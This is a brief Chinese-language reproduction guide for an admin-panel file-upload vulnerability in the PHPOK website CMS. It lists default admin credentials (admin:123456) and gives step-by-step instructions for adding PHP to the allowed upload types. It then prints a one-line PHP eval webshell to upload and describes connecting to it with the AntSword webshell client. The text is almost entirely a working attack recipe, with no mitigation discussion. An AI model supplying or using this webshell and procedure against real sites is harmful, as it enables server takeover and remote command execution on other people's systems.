1.漏洞描述
PHPOK是一套采用PHP+MYSQL语言开发的企业网站系统。 PHPOK存在后台文件上传漏洞,攻击者可利用该漏洞获取网站服务器控制权。 后台路径:/admin.php 用户名密码:admin:123456
2.打开后台使用密码登录
2.选择右上角功能菜单-工具-附件分类管理
3.选择压缩文件-编辑,在支持的附件类型中添加php-提交
4.内容管理-资讯中心 -点击行业新闻后的+号,点击选择图片,选择压缩文件后-现在本地文件,上传php脚本。
<?php @eval($_POST['cmd']);?>
5.点击预览查看文件路径及格式化后的文件名
6.根据路径和文件名使用蚁剑连接,http://ip:port/res/soft//574c0046a1a826a9.php